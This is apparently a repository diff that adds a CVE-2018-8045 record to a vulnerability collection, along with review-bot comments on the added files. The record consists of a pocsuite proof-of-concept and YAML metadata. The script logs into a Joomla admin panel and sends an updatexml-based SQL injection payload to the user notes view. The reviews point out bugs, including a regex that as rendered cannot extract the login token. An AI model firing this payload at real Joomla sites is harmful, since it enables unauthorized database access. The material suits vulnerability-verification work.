diff --git a/cve/joomla/2018/CVE-2018-8045/README.md b/cve/joomla/2018/CVE-2018-8045/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..25e3cf94c58a11e3a769e24a169953eb063c9c70
--- /dev/null
+++ b/cve/joomla/2018/CVE-2018-8045/README.md
@@ -0,0 +1,2 @@
+# CVE-2018-8045
+Joomla内核SQL注入漏洞原理及poc
\ No newline at end of file
diff --git a/cve/joomla/2018/CVE-2018-8045/joomla_user_notes_sqli.py b/cve/joomla/2018/CVE-2018-8045/joomla_user_notes_sqli.py
new file mode 100644
index 0000000000000000000000000000000000000000..e7ae600dc18000840b610f87f495227cf7792687
--- /dev/null
+++ b/cve/joomla/2018/CVE-2018-8045/joomla_user_notes_sqli.py
@@ -0,0 +1,70 @@
+#!/usr/bin/python
+# -*- coding: utf-8 -*-
+import re
+import hashlib
+from pocsuite.api.request import req
+from pocsuite.api.poc import register
+from pocsuite.lib.core.data import logger
+from pocsuite.api.poc import Output, POCBase
+from pocsuite.api.utils import randomStr
+from pocsuite.lib.core.enums import CUSTOM_LOGGING
+from urlparse import urljoin
+
+
+class TestPOC(POCBase):
+ vulID = ''
+ version = ''
+ author = 'luckybool1020'
+
+ def get_pass(self, joomla_session):
+ if any(para not in self.params for para in ['user', 'passwd']):
+ logger.log(
+ CUSTOM_LOGGING.SYSINFO,
+ "You can use --extra-params=\"{'user': 'xxx','passwd': 'xxx'}\" to exec command")
+ return self.parse_output(None)
+ else:
+ user, passwd = self.params['user'], self.params['passwd']
+ url = urljoin(self.url, '/administrator/index.php')
+ content = joomla_session.get(url).content
+ re_para = '.*'
+ match = re.findall(re_para, content, re.S)
+ if match:
+ value, token = match[0][0], match[0][1]
+ else:
+ return self.parse_output(None)
+ self.headers = {
+ "Content-Type": "application/x-www-form-urlencoded"
+ }
+ pass_payload = 'username={user}&passwd={passwd}&option=com_login&task=login&return={value}&{token}=1'.format(
+ user=user, passwd=passwd, value=value, token=token)
+ joomla_session.post(
+ url=url, params=None, headers=self.headers, data=pass_payload)
+
+ def _verify(self):
+ '''verify mode'''
+ result = {}
+ joomla_session = req.session()
+ self.get_pass(joomla_session)
+ rand_str = randomStr(10, "0123456789")
+ url = urljoin(self.url, '/administrator/index.php?option=com_users&view=notes')
+ sqli_payload = 'filter[search]=&list[fullordering]=a.review_time DESC&list[limit]=20&filter[published]=1&filter[category_id]=(updatexml(2,concat(0x7e,(md5({randstr}))),0))'.format(
+ randstr=rand_str)
+ r = joomla_session.post(url=url, headers=self.headers, data=sqli_payload)
+ if r.status_code == 500 and hashlib.md5(rand_str).hexdigest()[
+ 0:31] in r.content:
+ result['VerifyInfo'] = {}
+ result['VerifyInfo']['URL'] = url
+ return self.parse_output(result)
+
+ _attack = _verify
+
+ def parse_output(self, result):
+ output = Output(self)
+ if result:
+ output.success(result)
+ else:
+ output.fail('Internet nothing returned')
+ return output
+
+
+register(TestPOC)
\ No newline at end of file
diff --git a/cve/joomla/2018/yaml/CVE-2018-8045.yaml b/cve/joomla/2018/yaml/CVE-2018-8045.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..b19e536cf57fee6c0f46d19bdeba09cc15ca454f
--- /dev/null
+++ b/cve/joomla/2018/yaml/CVE-2018-8045.yaml
@@ -0,0 +1,21 @@
+id: CVE-2018-8045
+source:
+ https://github.com/luckybool1020/CVE-2018-8045
+info:
+ name: Joomla!是一套自由、开放源代码的内容管理系统,以PHP撰写,用于发布内容在万维网与内部网,通常被用来搭建商业网站、个人博客、信息管理系统、Web 服务等,还可以进行二次开发以扩展使用范围。其功能包含可提高性能的页面缓存、RSS馈送、页面的可打印版本、新闻摘要、博客、投票、网站搜索、与语言国际化。Joomla!是一套自由的开源软件,使用GPL许可。
+ severity: high
+ description:
+ 在 Joomla!从3.5.0到3.8.5,SQL 语句中缺少变量类型转换导致用户注释列表视图中存在 SQL 注入漏洞。
+ scope-of-influence:
+ Joomla! 3.5.0 through 3.8.5
+ reference:
+ - https://developer.joomla.org/security-centre/723-20180301-core-sqli-vulnerability.html
+ - https://nvd.nist.gov/vuln/detail/cve-2018-8045
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2018-8045
+ cwe-id: CWE-89
+ cnvd-id: None
+ kve-id: None
+ tags: SQL注入
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 9fdf2623ad2b75e42ebfe295c9b979dea2af2983..d6a5609bfcf89fcc34af0bef5b95aeba6dbd1d6b 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -149,6 +149,7 @@ cve:
 - CVE-2016-2107
 joomla:
 - CVE-2023-23752
+ - CVE-2018-8045
 libxml2:
 - CVE-2020-24977
 - CVE-2021-3517
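Review bot: `_verify` passes `headers=self.headers` to its second `joomla_session.post(...)`, but `self.headers` is assigned only on the success path of `get_pass`; when `user`/`passwd` are absent from `self.params` or the login-page regex matches nothing, `get_pass` returns early and that later call raises `AttributeError` unless `POCBase` already defines the attribute, which is not visible here. The `Output` that `get_pass` returns on those early exits is also discarded by `_verify`, so a skipped or failed login is reported with the same generic `'Internet nothing returned'` as a patched target, which makes the verdict hard to trust. Setting the header dict before any branch, having `get_pass` return `True` only after the login POST is sent, and returning early from `_verify` when it does not would make the two outcomes distinguishable. Separately, the pattern `re_para = '.*'` as rendered has no capture groups, so `match[0][0]` would index characters of a string rather than groups; this is probably the renderer stripping HTML tags out of the original pattern, but it is worth confirming against the committed file.
```python
    def get_pass(self, joomla_session):
        # Assigned before any early return so _verify can always rely on it.
        self.headers = {
            "Content-Type": "application/x-www-form-urlencoded"
        }
        if any(para not in self.params for para in ['user', 'passwd']):
            # … unchanged: usage hint via logger.log …
            return False
        # … unchanged: fetch login form, extract return value and token …
        if not match:
            return False
        # … unchanged: build pass_payload and POST it …
        return True

    def _verify(self):
        '''verify mode'''
        result = {}
        joomla_session = req.session()
        if not self.get_pass(joomla_session):
            return self.parse_output(None)
        # … unchanged: probe request and result handling …
```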
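Review bot: `cnvd-id: None` and `kve-id: None` are parsed by YAML as the string `"None"` rather than an absent value, so any consumer that checks whether these identifiers are present will see a populated field; use `cnvd-id: null` and `kve-id: null` (or omit the keys) if "not assigned" is the intent. The `name` field carries a general product description while the vulnerability summary lives in `description`; if downstream tooling renders `name` as a title, a short product-and-vulnerability name would read better, though that depends on how the other entries in this directory are written.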